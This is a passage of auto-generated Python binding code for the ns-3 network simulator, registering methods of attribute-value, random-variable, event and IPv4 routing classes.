cls.add_method('GetValueTypeName', 'std::string', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeChecker::HasUnderlyingTypeInformation() const [member function] cls.add_method('HasUnderlyingTypeInformation', 'bool', [], is_const=True, is_virtual=True) return def register_Ns3EmptyAttributeValue_methods(root_module, cls): ## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')]) ## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, visibility='private', is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], visibility='private', is_virtual=True) ## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, visibility='private', is_virtual=True) return def register_Ns3ErlangRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ErlangRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable::ErlangRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetK() const [member function] cls.add_method('GetK', 'uint32_t', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetLambda() const [member function] cls.add_method('GetLambda', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetValue(uint32_t k, double lambda) [member function] cls.add_method('GetValue', 'double', [param('uint32_t', 'k'), param('double', 'lambda')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetInteger(uint32_t k, uint32_t lambda) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'k'), param('uint32_t', 'lambda')]) ## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3EventImpl_methods(root_module, cls): ## event-impl.h (module 'core'): ns3::EventImpl::EventImpl(ns3::EventImpl const & arg0) [copy constructor] cls.add_constructor([param('ns3::EventImpl const &', 'arg0')]) ## event-impl.h (module 'core'): ns3::EventImpl::EventImpl() [constructor] cls.add_constructor([]) ## event-impl.h (module 'core'): void ns3::EventImpl::Cancel() [member function] cls.add_method('Cancel', 'void', []) ## event-impl.h (module 'core'): void ns3::EventImpl::Invoke() [member function] cls.add_method('Invoke', 'void', []) ## event-impl.h (module 'core'): bool ns3::EventImpl::IsCancelled() [member function] cls.add_method('IsCancelled', 'bool', []) ## event-impl.h (module 'core'): void ns3::EventImpl::Notify() [member function] cls.add_method('Notify', 'void', [], is_pure_virtual=True, visibility='protected', is_virtual=True) return def register_Ns3ExponentialRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ExponentialRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable::ExponentialRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetMean() const [member function] cls.add_method('GetMean', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetBound() const [member function] cls.add_method('GetBound', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue(double mean, double bound) [member function] cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'bound')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger(uint32_t mean, uint32_t bound) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'bound')]) ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3GammaRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::GammaRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable::GammaRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetAlpha() const [member function] cls.add_method('GetAlpha', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetBeta() const [member function] cls.add_method('GetBeta', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue(double alpha, double beta) [member function] cls.add_method('GetValue', 'double', [param('double', 'alpha'), param('double', 'beta')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger(uint32_t alpha, uint32_t beta) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'alpha'), param('uint32_t', 'beta')]) ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3Ipv4_methods(root_module, cls): ## ipv4.h (module 'internet'): ns3::Ipv4::Ipv4(ns3::Ipv4 const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4 const &', 'arg0')]) ## ipv4.h (module 'internet'): ns3::Ipv4::Ipv4() [constructor] cls.add_constructor([]) ## ipv4.h (module 'internet'): bool ns3::Ipv4::AddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('AddAddress', 'bool', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::AddInterface(ns3::Ptr<ns3::NetDevice> device) [member function] cls.add_method('AddInterface', 'uint32_t', [param('ns3::Ptr< ns3::NetDevice >', 'device')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ptr<ns3::Socket> ns3::Ipv4::CreateRawSocket() [member function] cls.add_method('CreateRawSocket', 'ns3::Ptr< ns3::Socket >', [], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::DeleteRawSocket(ns3::Ptr<ns3::Socket> socket) [member function] cls.add_method('DeleteRawSocket', 'void', [param('ns3::Ptr< ns3::Socket >', 'socket')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ipv4InterfaceAddress ns3::Ipv4::GetAddress(uint32_t interface, uint32_t addressIndex) const [member function] cls.add_method('GetAddress', 'ns3::Ipv4InterfaceAddress', [param('uint32_t', 'interface'), param('uint32_t', 'addressIndex')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForAddress(ns3::Ipv4Address address) const [member function] cls.add_method('GetInterfaceForAddress', 'int32_t', [param('ns3::Ipv4Address', 'address')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForDevice(ns3::Ptr<const ns3::NetDevice> device) const [member function] cls.add_method('GetInterfaceForDevice', 'int32_t', [param('ns3::Ptr< ns3::NetDevice const >', 'device')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForPrefix(ns3::Ipv4Address address, ns3::Ipv4Mask mask) const [member function] cls.add_method('GetInterfaceForPrefix', 'int32_t', [param('ns3::Ipv4Address', 'address'), param('ns3::Ipv4Mask', 'mask')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): uint16_t ns3::Ipv4::GetMetric(uint32_t interface) const [member function] cls.add_method('GetMetric', 'uint16_t', [param('uint32_t', 'interface')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): uint16_t ns3::Ipv4::GetMtu(uint32_t interface) const [member function] cls.add_method('GetMtu', 'uint16_t', [param('uint32_t', 'interface')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::GetNAddresses(uint32_t interface) const [member function] cls.add_method('GetNAddresses', 'uint32_t', [param('uint32_t', 'interface')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::GetNInterfaces() const [member function] cls.add_method('GetNInterfaces', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ptr<ns3::NetDevice> ns3::Ipv4::GetNetDevice(uint32_t interface) [member function] cls.add_method('GetNetDevice', 'ns3::Ptr< ns3::NetDevice >', [param('uint32_t', 'interface')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ptr<ns3::IpL4Protocol> ns3::Ipv4::GetProtocol(int protocolNumber) const [member function] cls.add_method('GetProtocol', 'ns3::Ptr< ns3::IpL4Protocol >', [param('int', 'protocolNumber')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ptr<ns3::IpL4Protocol> ns3::Ipv4::GetProtocol(int protocolNumber, int32_t interfaceIndex) const [member function] cls.add_method('GetProtocol', 'ns3::Ptr< ns3::IpL4Protocol >', [param('int', 'protocolNumber'), param('int32_t', 'interfaceIndex')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4::GetRoutingProtocol() const [member function] cls.add_method('GetRoutingProtocol', 'ns3::Ptr< ns3::Ipv4RoutingProtocol >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): static ns3::TypeId ns3::Ipv4::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::Insert(ns3::Ptr<ns3::IpL4Protocol> protocol) [member function] cls.add_method('Insert', 'void', [param('ns3::Ptr< ns3::IpL4Protocol >', 'protocol')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::Insert(ns3::Ptr<ns3::IpL4Protocol> protocol, uint32_t interfaceIndex) [member function] cls.add_method('Insert', 'void', [param('ns3::Ptr< ns3::IpL4Protocol >', 'protocol'), param('uint32_t', 'interfaceIndex')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): bool ns3::Ipv4::IsDestinationAddress(ns3::Ipv4Address address, uint32_t iif) const [member function] cls.add_method('IsDestinationAddress', 'bool', [param('ns3::Ipv4Address', 'address'), param('uint32_t', 'iif')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): bool ns3::Ipv4::IsForwarding(uint32_t interface) const [member function] cls.add_method('IsForwarding', 'bool', [param('uint32_t', 'interface')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): bool ns3::Ipv4::IsUp(uint32_t interface) const [member function] cls.add_method('IsUp', 'bool', [param('uint32_t', 'interface')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::Remove(ns3::Ptr<ns3::IpL4Protocol> protocol) [member function] cls.add_method('Remove', 'void', [param('ns3::Ptr< ns3::IpL4Protocol >', 'protocol')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::Remove(ns3::Ptr<ns3::IpL4Protocol> protocol, uint32_t interfaceIndex) [member function] cls.add_method('Remove', 'void', [param('ns3::Ptr< ns3::IpL4Protocol >', 'protocol'), param('uint32_t', 'interfaceIndex')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): bool ns3::Ipv4::RemoveAddress(uint32_t interface, uint32_t addressIndex) [member function] cls.add_method('RemoveAddress', 'bool', [param('uint32_t', 'interface'), param('uint32_t', 'addressIndex')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): bool ns3::Ipv4::RemoveAddress(uint32_t interface, ns3::Ipv4Address address) [member function] cls.add_method('RemoveAddress', 'bool', [param('uint32_t', 'interface'), param('ns3::Ipv4Address', 'address')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4::SelectSourceAddress(ns3::Ptr<const ns3::NetDevice> device, ns3::Ipv4Address dst, ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e scope) [member function] cls.add_method('SelectSourceAddress', 'ns3::Ipv4Address', [param('ns3::Ptr< ns3::NetDevice const >', 'device'), param('ns3::Ipv4Address', 'dst'), param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::Send(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Address source, ns3::Ipv4Address destination, uint8_t protocol, ns3::Ptr<ns3::Ipv4Route> route) [member function] cls.add_method('Send', 'void', [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Address', 'source'), param('ns3::Ipv4Address', 'destination'), param('uint8_t', 'protocol'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SendWithHeader(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Header ipHeader, ns3::Ptr<ns3::Ipv4Route> route) [member function] cls.add_method('SendWithHeader', 'void', [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Header', 'ipHeader'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SetDown(uint32_t interface) [member function] cls.add_method('SetDown', 'void', [param('uint32_t', 'interface')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SetForwarding(uint32_t interface, bool val) [member function] cls.add_method('SetForwarding', 'void', [param('uint32_t', 'interface'), param('bool', 'val')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SetMetric(uint32_t interface, uint16_t metric) [member function] cls.add_method('SetMetric', 'void', [param('uint32_t', 'interface'), param('uint16_t', 'metric')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SetRoutingProtocol(ns3::Ptr<ns3::Ipv4RoutingProtocol> routingProtocol) [member function] cls.add_method('SetRoutingProtocol', 'void', [param('ns3::Ptr< ns3::Ipv4RoutingProtocol >', 'routingProtocol')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SetUp(uint32_t interface) [member function] cls.add_method('SetUp', 'void', [param('uint32_t', 'interface')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4::SourceAddressSelection(uint32_t interface, ns3::Ipv4Address dest) [member function] cls.add_method('SourceAddressSelection', 'ns3::Ipv4Address', [param('uint32_t', 'interface'), param('ns3::Ipv4Address', 'dest')], is_pure_virtual=True, is_virtual=True) ## ipv4.h (module 'internet'): ns3::Ipv4::IF_ANY [variable] cls.add_static_attribute('IF_ANY', 'uint32_t const', is_const=True) ## ipv4.h (module 'internet'): bool ns3::Ipv4::GetIpForward() const [member function] cls.add_method('GetIpForward', 'bool', [], is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True) ## ipv4.h (module 'internet'): bool ns3::Ipv4::GetWeakEsModel() const [member function] cls.add_method('GetWeakEsModel', 'bool', [], is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SetIpForward(bool forward) [member function] cls.add_method('SetIpForward', 'void', [param('bool', 'forward')], is_pure_virtual=True, visibility='private', is_virtual=True) ## ipv4.h (module 'internet'): void ns3::Ipv4::SetWeakEsModel(bool model) [member function] cls.add_method('SetWeakEsModel', 'void', [param('bool', 'model')], is_pure_virtual=True, visibility='private', is_virtual=True) return def register_Ns3Ipv4AddressChecker_methods(root_module, cls): ## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker(ns3::Ipv4AddressChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4AddressChecker const &', 'arg0')]) return def register_Ns3Ipv4AddressValue_methods(root_module, cls): ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4AddressValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4AddressValue const &', 'arg0')]) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4Address const & value) [constructor] cls.add_constructor([param('ns3::Ipv4Address const &', 'value')]) ## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4AddressValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4AddressValue::Get() const [member function] cls.add_method('Get', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-address.h (module 'network'): std::string ns3::Ipv4AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4AddressValue::Set(ns3::Ipv4Address const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Ipv4Address const &', 'value')]) return def register_Ns3Ipv4MaskChecker_methods(root_module, cls): ## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker(ns3::Ipv4MaskChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4MaskChecker const &', 'arg0')]) return def register_Ns3Ipv4MaskValue_methods(root_module, cls): ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4MaskValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4MaskValue const &', 'arg0')]) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4Mask const & value) [constructor] cls.add_constructor([param('ns3::Ipv4Mask const &', 'value')]) ## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4MaskValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4MaskValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask ns3::Ipv4MaskValue::Get() const [member function] cls.add_method('Get', 'ns3::Ipv4Mask', [], is_const=True) ## ipv4-address.h (module 'network'): std::string ns3::Ipv4MaskValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4MaskValue::Set(ns3::Ipv4Mask const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Ipv4Mask const &', 'value')]) return def register_Ns3Ipv4MulticastRoute_methods(root_module, cls): ## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::Ipv4MulticastRoute(ns3::Ipv4MulticastRoute const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4MulticastRoute const &', 'arg0')]) ## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::Ipv4MulticastRoute() [constructor] cls.add_constructor([]) ## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4MulticastRoute::GetGroup() const [member function] cls.add_method('GetGroup', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4MulticastRoute::GetOrigin() const [member function] cls.add_method('GetOrigin', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-route.h (module 'internet'): std::map<unsigned int, unsigned int, std::less<unsigned int>, std::allocator<std::pair<unsigned int const, unsigned int> > > ns3::Ipv4MulticastRoute::GetOutputTtlMap() const [member function] cls.add_method('GetOutputTtlMap', 'std::map< unsigned int, unsigned int >', [], is_const=True) ## ipv4-route.h (module 'internet'): uint32_t ns3::Ipv4MulticastRoute::GetParent() const [member function] cls.add_method('GetParent', 'uint32_t', [], is_const=True) ## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetGroup(ns3::Ipv4Address const group) [member function] cls.add_method('SetGroup', 'void', [param('ns3::Ipv4Address const', 'group')]) ## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetOrigin(ns3::Ipv4Address const origin) [member function] cls.add_method('SetOrigin', 'void', [param('ns3::Ipv4Address const', 'origin')]) ## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetOutputTtl(uint32_t oif, uint32_t ttl) [member function] cls.add_method('SetOutputTtl', 'void', [param('uint32_t', 'oif'), param('uint32_t', 'ttl')]) ## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetParent(uint32_t iif) [member function] cls.add_method('SetParent', 'void', [param('uint32_t', 'iif')]) ## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::MAX_INTERFACES [variable] cls.add_static_attribute('MAX_INTERFACES', 'uint32_t const', is_const=True) ## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::MAX_TTL [variable] cls.add_static_attribute('MAX_TTL', 'uint32_t const', is_const=True) return def register_Ns3Ipv4Route_methods(root_module, cls): cls.add_output_stream_operator() ## ipv4-route.h (module 'internet'): ns3::Ipv4Route::Ipv4Route(ns3::Ipv4Route const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4Route const &', 'arg0')]) ## ipv4-route.h (module 'internet'): ns3::Ipv4Route::Ipv4Route() [constructor] cls.add_constructor([]) ## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Route::GetDestination() const [member function] cls.add_method('GetDestination', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Route::GetGateway() const [member function] cls.add_method('GetGateway', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-route.h (module 'internet'): ns3::Ptr<ns3::NetDevice> ns3::Ipv4Route::GetOutputDevice() const [member function] cls.add_method('GetOutputDevice', 'ns3::Ptr< ns3::NetDevice >', [], is_const=True) ## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Route::GetSource() const [member function] cls.add_method('GetSource', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetDestination(ns3::Ipv4Address dest) [member function] cls.add_method('SetDestination', 'void', [param('ns3::Ipv4Address', 'dest')]) ## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetGateway(ns3::Ipv4Address gw) [member function] cls.add_method('SetGateway', 'void', [param('ns3::Ipv4Address', 'gw')]) ## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetOutputDevice(ns3::Ptr<ns3::NetDevice> outputDevice) [member function] cls.add_method('SetOutputDevice', 'void', [param('ns3::Ptr< ns3::NetDevice >', 'outputDevice')]) ## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetSource(ns3::Ipv4Address src) [member function] cls.add_method('SetSource', 'void', [param('ns3::Ipv4Address', 'src')]) return def register_Ns3Ipv4RoutingProtocol_methods(root_module, cls): ## ipv4-routing-protocol.h (module 'internet'): ns3::Ipv4RoutingProtocol::Ipv4RoutingProtocol() [constructor] cls.add_constructor([]) ## ipv4-routing-protocol.h (module 'internet'): ns3::Ipv4RoutingProtocol::Ipv4RoutingProtocol(ns3::Ipv4RoutingProtocol const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4RoutingProtocol const &', 'arg0')]) ## ipv4-routing-protocol.h (module 'internet'): static ns3::TypeId ns3::Ipv4RoutingProtocol::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyAddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('NotifyAddAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], is_pure_virtual=True, is_virtual=True) ## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyInterfaceDown(uint32_t interface) [member function] cls.add_method('NotifyInterfaceDown', 'void', [param('uint32_t', 'interface')], is_pure_virtual=True, is_virtual=True) ## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyInterfaceUp(uint32_t interface) [member function] cls.add_method('NotifyInterfaceUp', 'void', [param('uint32_t', 'interface')], is_pure_virtual=True, is_virtual=True) ## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyRemoveAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('NotifyRemoveAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], is_pure_virtual=True, is_virtual=True) ## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::PrintRoutingTable(ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) const [member function] cls.add_method('PrintRoutingTable', 'void', [param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4-routing-protocol.h (module 'internet'): bool ns3::Ipv4RoutingProtocol::RouteInput(ns3::Ptr<const ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<const ns3::NetDevice> idev, ns3::Callback<void,ns3::Ptr<ns3::Ipv4Route>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ucb, ns3::Callback<void,ns3::Ptr<ns3::Ipv4MulticastRoute>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> mcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,unsigned int,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> lcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::Socket::SocketErrno,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ecb) [member function] cls.add_method('RouteInput', 'bool', [param('ns3::Ptr< ns3::Packet const >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice const >', 'idev'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, 